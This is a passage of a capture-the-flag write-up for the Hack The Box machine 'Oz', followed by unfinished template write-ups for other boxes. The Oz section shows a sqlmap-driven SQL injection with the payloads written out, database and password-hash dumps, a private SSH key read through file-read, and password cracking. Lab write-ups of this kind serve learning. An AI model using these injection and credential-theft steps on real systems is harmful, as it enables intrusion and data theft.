→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.96
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/17 11:55:43 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96/194ad667-6357-4e67-8b9f-601382c8bc49 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.96:8080
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.96:8080
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2021/01/17 11:55:47 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.96:8080/d87af5e8-6226-494c-9eeb-8fd9699648b3 => 200. To force processing of Wildcard responses, specify the '--wildcard' switch
Dirbusting won't help us here, so let's view the pages manually:
![](prg/13/2.png)
Port 8080 gives us a login page, however there doesn't seem to be any sql injections nor can we dirbust it.
![](prg/13/1.png)
Port 80 gives us a webAPI asking for an username
![](prg/13/3.png)
As we give different usernames we get a different response, so let's continue from curl:
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96
OZ webapi
### Please register a username!
%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing2
GSBG0D4LRACK1065VFTSOVAP5C7PCG3TB49PFCF7MEQ6IIR0IO7M4PEMXD36ML42NTDAH4ZSALOZW9OWXT6RJ85I3XE49RA6JDT537SIGV82U5F9DR5X8SAB9WI637PGN4UBZ2K7WTBTSBQGR6Z2ZKWH39MJSFEP3AMSM2XTE9VJPTM9LSNUV7ZPPNWOJBV743Q6NMR5WNHSQ4J6O19E5S0KTFMSUUQO6OA5X2U0GZK0W0P%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing3
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing4
DF03OPTMZ596RUG97CSR8KE2ZEP31YP95VEESEDAIT2ZFFVLLG71Q1%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing5
Please register a username!%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing6
KQAISB6RL5L8VGSR4JWJHE35HA77FUF1L9A1WHD8F1PNEM5MTADE0PZZ42HAIRI6H57U5CBRZGLBPD25G3EP547BMBL3RE7QWFML3879YX2FE20HRU7U5Y40WIWEXQS1H1OYYP62AW86PA6ORH9XFBTC8E6H16TNPBYVDO%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing7
38NQLZG275I1W7SJW67SPMDMR9MXIDWOSZVA6M1R990A0VQXYXVZAPOB07QF0RX9E92HZ2S3XLOV7ST0O6F4TH2710WPCOVX7TXLSUQSYNQMYIUG1W0QIZKYE8MHWCU6HI2OKPSKGXFTQG9QRAI0S4SB5X82UUGSI4N18XEQP4NIBBACYVODBYCGI15NP3AYBVNJMXRN3YN3P7BD8CPLJCY8W8KKVEPVT51BKETON14BTO4M19S2%
[ 10.10.14.16/23 ] [ /dev/pts/2 ] [~]
→ curl 10.10.10.96/nothing8
M8KAGOFMGES8MS9TS3V53ZWRHCFFAA8YVL0MZ86JRJNMJJP9JOGXV3SNUSHKJ4GG0HD7DCN1Y5X43DDE2GB5DA7WV6MWKJO4HGSP5U8WCJ9XWGJVH2B7XL8XKGVUC0FWCZPO1WTQFK49Q3DJG23VPMXEC4NFZ8435VAXDVPDBGFK3DDQFL1V3DWFWSBWTSDQRP943%
We can use wfuzz to enumerate the responses from port 80, and exclude the responses that include only 1-4 words:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --hw 1,4 10.10.10.96/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.96/FUZZ
Total requests: 87664
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 3 L 6 W 75 Ch "# directory-list-2.3-small.txt"
000000003: 200 3 L 6 W 75 Ch "# Copyright 2007 James Fisher"
000000007: 200 3 L 6 W 75 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000014: 200 3 L 6 W 75 Ch "http://10.10.10.96/"
000000006: 200 3 L 6 W 75 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000011: 200 3 L 6 W 75 Ch "# Priority ordered case sensative list, where entries were found"
000000005: 200 3 L 6 W 75 Ch "# This work is licensed under the Creative Commons"
000000013: 200 3 L 6 W 75 Ch "#"
000000010: 200 3 L 6 W 75 Ch "#"
000000008: 200 3 L 6 W 75 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000009: 200 3 L 6 W 75 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000012: 200 3 L 6 W 75 Ch "# on atleast 3 different hosts"
000000002: 200 3 L 6 W 75 Ch "#"
000000004: 200 3 L 6 W 75 Ch "#"
000000202: 200 3 L 6 W 79 Ch "users"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...
Total time: 0
Processed Requests: 975
Filtered Requests: 960
Requests/sec.: 0
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users
OZ webapi
### Please register a username!
%
From here we get the username register message in bold letters, which means that something is different
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 79
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:46 GMT
<
OZ webapi
### Please register a username!
* Closing connection 0
%
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users/ -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users/ HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 200 OK
< Content-Type: text/html; charset=utf-8
< Content-Length: 89
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:49 GMT
<
OZ webapi
### Please register a username!
* Closing connection 0
%
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ curl 10.10.10.96/users/"'" -v
* Trying 10.10.10.96:80...
* Connected to 10.10.10.96 (10.10.10.96) port 80 (#0)
> GET /users/' HTTP/1.1
> Host: 10.10.10.96
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
* HTTP 1.0, assume close after body
< HTTP/1.0 500 INTERNAL SERVER ERROR
< Content-Type: text/html
< Content-Length: 291
< Server: Werkzeug/0.14.1 Python/2.7.14
< Date: Thu, 21 Jan 2021 13:44:53 GMT
<
500 Internal Server Error
# Internal Server Error
The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.
* Closing connection 0
After enumerating that url we see something weird, putting ' after the url returns an internal server error with code 500. This is probably a SQL injection so let's verify that:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --batch
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:42:40 /2021-01-21/
[14:42:40] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[14:42:40] [INFO] testing connection to the target URL
[14:42:40] [INFO] checking if the target is protected by some kind of WAF/IPS
[14:42:40] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS
are you sure that you want to continue with further target testing? [Y/n] Y
[14:42:40] [WARNING] please consider usage of tamper scripts (option '--tamper')
[14:42:40] [INFO] testing if the target URL content is stable
[14:42:41] [INFO] target URL content is stable
[14:42:41] [INFO] testing if URI parameter '#1*' is dynamic
[14:42:41] [INFO] URI parameter '#1*' appears to be dynamic
[14:42:41] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[14:42:41] [INFO] testing for SQL injection on URI parameter '#1*'
[14:42:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:42:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:42:43] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[14:42:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[14:42:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[14:42:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[14:42:45] [INFO] testing 'Generic inline queries'
[14:42:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[14:42:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[14:42:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[14:42:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:42:58] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:42:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:42:58] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:43:01] [INFO] target URL appears to be UNION injectable with 1 columns
[14:43:01] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://10.10.10.96:80/users/' AND (SELECT 5564 FROM (SELECT(SLEEP(5)))XXXV) AND 'JCgZ'='JCgZ
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: http://10.10.10.96:80/users/' UNION ALL SELECT CONCAT(0x716b6a6a71,0x4c53726344695a75686c4c714a766e4e56545a5a4b4c61655457764361447776536a684645747a54,0x716a767071)-- -
---
[14:43:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:43:01] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 40 times
[14:43:01] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:43:01 /2021-01-21/
And here we see that the URL parameter is vulnerable, so let's enumerate it further to get the databases available:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --dbs --batch
available databases [4]:
[*] information_schema
[*] mysql
[*] ozdb
[*] performance_schema
[14:44:45] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[14:44:45] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:44:45 /2021-01-21/
Now let's enumerate annd see if we can find password hashes:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --passwords --batch
---
[14:45:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[14:45:17] [INFO] fetching database users password hashes
[14:45:18] [INFO] retrieved: 'root',''
[14:45:18] [INFO] retrieved: 'dorthi',''
[14:45:18] [INFO] retrieved: 'root',''
[14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
[14:45:18] [INFO] retrieved: 'dorthi','*43AE542A63D9C43FF9D40D0280CFDA58F6C747CA'
[14:45:18] [INFO] retrieved: 'root','*61A2BD98DAD2A09749B6FC77A9578609D32518DD'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:45:19] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:45:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:45:19] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:45:19] [INFO] starting 3 processes
[14:45:31] [WARNING] no clear password(s) found
database management system users password hashes:
[*] dorthi [1]:
password hash: *43AE542A63D9C43FF9D40D0280CFDA58F6C747CA
[*] root [1]:
password hash: *61A2BD98DAD2A09749B6FC77A9578609D32518DD
[14:45:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[14:45:31] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:45:31 /2021-01-21/
Now let's see if we can get the contents of the ozdb database:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ -D ozdb --batch --dump
___
Table: users_gbw
[6 entries]
+----+----------------------------------------------------------------------------------------+-------------+
| id | password | username |
+----+----------------------------------------------------------------------------------------+-------------+
| 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
| 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
| 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
| 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
| 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
| 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+----+----------------------------------------------------------------------------------------+-------------+
[14:47:36] [INFO] retrieved: 'db information loaded to ticket application for shared db access','12','GBR-9872'
Database: ozdb
Table: tickets_gbw
[12 entries]
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| id | name | desc |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
| 1 | GBR-987 | Reissued new id_rsa and id_rsa.pub keys for ssh access to dorthi. |
| 2 | GBR-1204 | Where did all these damn monkey's come from!? I need to call pest control. |
| 3 | GBR-1205 | Note to self: Toto keeps chewing on the curtain, find one with dog repellent. |
| 4 | GBR-1389 | Nothing to see here... V2hhdCBkaWQgeW91IGV4cGVjdD8= |
| 5 | GBR-4034 | Think of a better secret knock for the front door. Doesn't seem that secure, a Lion got in today. |
| 6 | GBR-5012 | I bet you won't read the next entry. |
| 7 | GBR-7890 | HAHA! Made you look. |
| 8 | GBR-7945 | Dorthi should be able to find her keys in the default folder under /home/dorthi/ on the db. |
| 9 | GBR-8011 | Seriously though, WW91J3JlIGp1c3QgdHJ5aW5nIHRvbyBoYXJkLi4uIG5vYm9keSBoaWRlcyBhbnl0aGluZyBpbiBiYXNlNjQgYW55bW9yZS4uLiBjJ21vbi4= |
| 10 | GBR-8042 | You are just wasting time now... someone else is getting user.txt |
| 11 | GBR-8457 | Look... now they've got root.txt and you don't even have user.txt |
| 12 | GBR-9872 | db information loaded to ticket application for shared db access |
+----+----------+--------------------------------------------------------------------------------------------------------------------------------+
[14:47:36] [INFO] table 'ozdb.tickets_gbw' dumped to CSV file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/dump/ozdb/tickets_gbw.csv'
[14:47:36] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[14:47:36] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:47:36 /2021-01-21/
Now that we have MYSQL hashes, ozdb user hashes and possible ssh keys, we enumerate it further using the --file-read option, akthough it is not able to give us the user flag, it does give us the /etc/hosts file:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --file-read=/etc/hosts --batch
[14:53:22] [INFO] the back-end DBMS operating system is Linux
[14:53:22] [INFO] fetching file: '/etc/hosts'
do you want confirmation that the remote file '/etc/hosts' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y
[14:53:22] [INFO] the local file '/home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts' and the remote file '/etc/hosts' have the same size (175 B)
files saved to [1]:
[*] /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts (same file)
[14:53:22] [INFO] fetched data logged to text files under '/home/nothing/.local/share/sqlmap/output/10.10.10.96'
[*] ending @ 14:53:22 /2021-01-21/
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_etc_hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.100.10.4 b9b370edd41a
the randomly generated hostname is a hint that this is a docker container, next we grab the ssh keys:
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ sqlmap -u http://10.10.10.96/users/ --file-read=/home/dorthi/.ssh/id_rsa --batch
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~]
→ cat /home/nothing/.local/share/sqlmap/output/10.10.10.96/files/_home_dorthi_.ssh_id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,66B9F39F33BA0788CD27207BF8F2D0F6
RV903H6V6lhKxl8dhocaEtL4Uzkyj1fqyVj3eySqkAFkkXms2H+4lfb35UZb3WFC
b6P7zYZDAnRLQjJEc/sQVXuwEzfWMa7pYF9Kv6ijIZmSDOMAPjaCjnjnX5kJMK3F
e1BrQdh0phWAhhUmbYvt2z8DD/OGKhxlC7oT/49I/ME+tm5eyLGbK69Ouxb5PBty
h9A+Tn70giENR/ExO8qY4WNQQMtiCM0tszes8+guOEKCckMivmR2qWHTCs+N7wbz
a//JhOG+GdqvEhJp15pQuj/3SC9O5xyLe2mqL1TUK3WrFpQyv8lXartH1vKTnybd
9+Wme/gVTfwSZWgMeGQjRXWe3KUsgGZNFK75wYtA/F/DB7QZFwfO2Lb0mL7Xyzx6
ZakulY4bFpBtXsuBJYPNy7wB5ZveRSB2f8dznu2mvarByMoCN/XgVVZujugNbEcj
evroLGNe/+ISkJWV443KyTcJ2iIRAa+BzHhrBx31kG//nix0vXoHzB8Vj3fqh+2M
EycVvDxLK8CIMzHc3cRVUMBeQ2X4GuLPGRKlUeSrmYz/sH75AR3zh6Zvlva15Yav
5vR48cdShFS3FC6aH6SQWVe9K3oHzYhwlfT+wVPfaeZrSlCH0hG1z9C1B9BxMLQr
DHejp9bbLppJ39pe1U+DBjzDo4s6rk+Ci/5dpieoeXrmGTqElDQi+KEU9g8CJpto
bYAGUxPFIpPrN2+1RBbxY6YVaop5eyqtnF4ZGpJCoCW2r8BRsCvuILvrO1O0gXF+
wtsktmylmHvHApoXrW/GThjdVkdD9U/6Rmvv3s/OhtlAp3Wqw6RI+KfCPGiCzh1V
0yfXH70CfLO2NcWtO/JUJvYH3M+rvDDHZSLqgW841ykzdrQXnR7s9Nj2EmoW72IH
znNPmB1LQtD45NH6OIG8+QWNAdQHcgZepwPz4/9pe2tEqu7Mg/cLUBsTYb4a6mft
icOX9OAOrcZ8RGcIdVWtzU4q2YKZex4lyzeC/k4TAbofZ0E4kUsaIbFV/7OMedMC
zCTJ6rlAl2d8e8dsSfF96QWevnD50yx+wbJ/izZonHmU/2ac4c8LPYq6Q9KLmlnu
vI9bLfOJh8DLFuqCVI8GzROjIdxdlzk9yp4LxcAnm1Ox9MEIqmOVwAd3bEmYckKw
w/EmArNIrnr54Q7a1PMdCsZcejCjnvmQFZ3ko5CoFCC+kUe1j92i081kOAhmXqV3
c6xgh8Vg2qOyzoZm5wRZZF2nTXnnCQ3OYR3NMsUBTVG2tlgfp1NgdwIyxTWn09V0
nOzqNtJ7OBt0/RewTsFgoNVrCQbQ8VvZFckvG8sV3U9bh9Zl28/2I3B472iQRo+5
uoRHpAgfOSOERtxuMpkrkU3IzSPsVS9c3LgKhiTS5wTbTw7O/vxxNOoLpoxO2Wzb
/4XnEBh6VgLrjThQcGKigkWJaKyBHOhEtuZqDv2MFSE6zdX/N+L/FRIv1oVR9VYv
QGpqEaGSUG+/TSdcANQdD3mv6EGYI+o4rZKEHJKUlCI+I48jHbvQCLWaR/bkjZJu
XtSuV0TJXto6abznSC1BFlACIqBmHdeaIXWqH+NlXOCGE8jQGM8s/fd/j5g1Adw3
-----END RSA PRIVATE KEY-----
This is an encrypted private key, so we could try to crack it using johnby first turning it into a hash
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ locate ssh2john
/usr/share/john/ssh2john.py
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ python $(locate ssh2john)
Usage: /usr/share/john/ssh2john.py
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ python $(locate ssh2john) id_rsa > hash
[ 10.10.14.14/23 ] [ /dev/pts/1 ] [~/_HTB/oz]
→ cat hash
id_rsa:$sshng$1$16$66B9F39F33BA0788CD27207BF8F2D0F6$1200$455f74dc7e95ea584ac65f1d86871a12d2f85339328f57eac958f77b24aa9001649179acd87fb895f6f7e5465bdd61426fa3fbcd864302744b42324473fb10557bb01337d631aee9605f4abfa8a32199920ce3003e36828e78e75f990930adc57b506b41d874a615808615266d8beddb3f030ff3862a1c650bba13ff8f48fcc13eb66e5ec8b19b2baf4ebb16f93c1b7287d03e4e7ef482210d47f1313bca98e1635040cb6208cd2db337acf3e82e384282724322be6476a961d30acf8def06f36bffc984e1be19daaf121269d79a50ba3ff7482f4ee71c8b7b69aa2f54d42b75ab169432bfc9576abb47d6f2939f26ddf7e5a67bf8154dfc1265680c78642345759edca52c80664d14aef9c18b40fc5fc307b4191707ced8b6f498bed7cb3c7a65a92e958e1b16906d5ecb812583cdcbbc01e59bde4520767fc7739eeda6bdaac1c8ca0237f5e055566e8ee80d6c47237afae82c635effe212909595e38dcac93709da221101af81cc786b071df5906fff9e2c74bd7a07cc1f158f77ea87ed8c132715bc3c4b2bc0883331dcddc45550c05e4365f81ae2cf1912a551e4ab998cffb07ef9011df387a66f96f6b5e586afe6f478f1c7528454b7142e9a1fa4905957bd2b7a07cd887095f4fec153df69e66b4a5087d211b5cfd0b507d07130b42b0c77a3a7d6db2e9a49dfda5ed54f83063cc3a38b3aae4f828bfe5da627a8797ae6193a84943422f8a114f60f02269b686d80065313c52293eb376fb54416f163a6156a8a797b2aad9c5e191a9242a025b6afc051b02bee20bbeb3b53b481717ec2db24b66ca5987bc7029a17ad6fc64e18dd564743f54ffa466befdecfce86d940a775aac3a448f8a7c23c6882ce1d55d327d71fbd027cb3b635c5ad3bf25426f607dccfabbc30c76522ea816f38d7293376b4179d1eecf4d8f6126a16ef6207ce734f981d4b42d0f8e4d1fa3881bcf9058d01d40772065ea703f3e3ff697b6b44aaeecc83f70b501b1361be1aea67ed89c397f4e00eadc67c4467087555adcd4e2ad982997b1e25cb3782fe4e1301ba1f674138914b1a21b155ffb38c79d302cc24c9eab94097677c7bc76c49f17de9059ebe70f9d32c7ec1b27f8b36689c7994ff669ce1cf0b3d8aba43d28b9a59eebc8f5b2df38987c0cb16ea82548f06cd13a321dc5d97393dca9e0bc5c0279b53b1f4c108aa6395c007776c49987242b0c3f12602b348ae7af9e10edad4f31d0ac65c7a30a39ef990159de4a390a81420be9147b58fdda2d3cd643808665ea57773ac6087c560daa3b2ce8666e70459645da74d79e7090dce611dcd32c5014d51b6b6581fa75360770232c535a7d3d5749cecea36d27b381b74fd17b04ec160a0d56b0906d0f15bd915c92f1bcb15dd4f5b87d665dbcff6237078ef6890468fb9ba8447a4081f39238446dc6e32992b914dc8cd23ec552f5cdcb80a8624d2e704db4f0ecefefc7134ea0ba68c4ed96cdbff85e710187a5602eb8d38507062a282458968ac811ce844b6e66a0efd8c15213acdd5ff37e2ff15122fd68551f5562f406a6a11a192506fbf4d275c00d41d0f79afe8419823ea38ad92841c929494223e238f231dbbd008b59a47f6e48d926e5ed4ae5744c95eda3a69bce7482d4116500222a0661dd79a2175aa1fe3655ce08613c8d018cf2cfdf77f8f983501dc37
However the intended path was to crack the hashes we got from ozdb, particularly wizard.oz's password hash
Table: users_gbw
[6 entries]
+----+----------------------------------------------------------------------------------------+-------------+
| id | password | username |
+----+----------------------------------------------------------------------------------------+-------------+
| 1 | $pbkdf2-sha256$5000$aA3h3LvXOseYk3IupVQKgQ$ogPU/XoFb.nzdCGDulkW3AeDZPbK580zeTxJnG0EJ78 | dorthi |
| 2 | $pbkdf2-sha256$5000$GgNACCFkDOE8B4AwZgzBuA$IXewCMHWhf7ktju5Sw.W.ZWMyHYAJ5mpvWialENXofk | tin.man |
| 3 | $pbkdf2-sha256$5000$BCDkXKuVMgaAEMJ4z5mzdg$GNn4Ti/hUyMgoyI7GKGJWeqlZg28RIqSqspvKQq6LWY | wizard.oz |
| 4 | $pbkdf2-sha256$5000$bU2JsVYqpbT2PqcUQmjN.Q$hO7DfQLTL6Nq2MeKei39Jn0ddmqly3uBxO/tbBuw4DY | coward.lyon |
| 5 | $pbkdf2-sha256$5000$Zax17l1Lac25V6oVwnjPWQ$oTYQQVsuSz9kmFggpAWB0yrKsMdPjvfob9NfBq4Wtkg | toto |
| 6 | $pbkdf2-sha256$5000$d47xHsP4P6eUUgoh5BzjfA$jWgyYmxDK.slJYUTsv9V9xZ3WWwcl9EBOsz.bARwGBQ | admin |
+----+----------------------------------------------------------------------------------------+-------------+
so we crack it using john and rockyou.txt and we get the password wizardofoz22, so let's login:
![](prg/13/4.png) ![](prg/13/5.png)
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/14.md Normal file
View file

@ -0,0 +1,66 @@
# Zipper Writeup
![](img/14.png)
## Introduction :
Zipper is a hard linux box released back in October 2018.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -sCV -p1,2 10.10.10.1
## **Part 2 : Getting User Access**
the text goes here
## **Part 3 : Getting Root Access**
the text goes here
## **Conclusion**
Here we can see the progress graph :

66
Hard/15.md Normal file
View file

@ -0,0 +1,66 @@
# Conceal Writeup
![](img/15.png)
## Introduction :
Conceal is a hard windows box released back in January 2019.
## **Part 1 : Initial Enumeration**
As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sT** for tcp ports and **-sU** to for udp ports.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
→ sudo nmap -vvv -sTU -p- 10.10.10.1 --max-retries 0 -Pn --min-rate=500 | grep Discovered
Once we know which ports are opened, we enumerate the ones we want with **-p** , using the flags **-sC** for default scripts, and **-sV** to enumerate versions.
[ 10.10.14.40/23 ] [ /dev/pts/12 ] [~]
